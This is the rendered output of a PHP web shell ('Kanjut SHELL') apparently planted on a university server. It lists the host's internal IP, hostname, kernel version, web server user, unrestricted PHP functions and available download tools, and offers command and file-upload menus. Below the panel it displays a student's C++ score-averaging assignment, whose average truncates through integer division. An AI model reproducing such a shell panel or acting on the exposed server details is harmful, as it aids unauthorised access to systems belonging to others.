Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.144.100.252
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/owpile/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/owpile/assign1.cpp
//      CS 212 CS 2 Assignment 
//      Due: Mon. Feb. 9, 2011
//
//      File name: assign1.cpp
//      Author: Orlando Pile
//      Instructor: Dr. Wang
//
//      Compile: g++ assign1.cpp
//      Run: ./a.out < stuScores.txt > out.txt
//
//      Goal:Write a program to read a file for the
//		students' scores, process it, and output 
//		the average for each student               
//


#include<iostream>
using namespace std;

struct StudentRec
{	string first;
	string last;
	int test1;
	int test2;
	int test3;
	float avg;
};

int main()
{
	StudentRec stu;
	string s1, s2;
	int t1, t2, t3;
	float avg;
	int sum;
	
	cin >> s1 >> s2 >> t1 >> t2 >> t3;
	stu.first = s1;
	stu.last = s2;
	stu.test1 = t1;
	stu.test2 = t2;
	stu.test3 = t3;
	sum = t1 + t2 + t3;
	avg = sum/3;
	while(cin)
	{
		//process
		cout << "Name: " << stu.first << " " << stu.last
			<< ", Tests: " << stu.test1 << ", " 
			<< stu.test2 << ", " << stu.test3 << ", Average: " << avg << endl;

		 cin >> s1 >> s2 >> t1 >> t2 >> t3;
       		 stu.first = s1;
       		 stu.last = s2;
        	 stu.test1 = t1;
       		 stu.test2 = t2;
       		 stu.test3 = t3;
		 sum = t1 + t2 + t3;
		 avg = sum/3;	
	}
	return 0;
}

Stv3n404 - 2023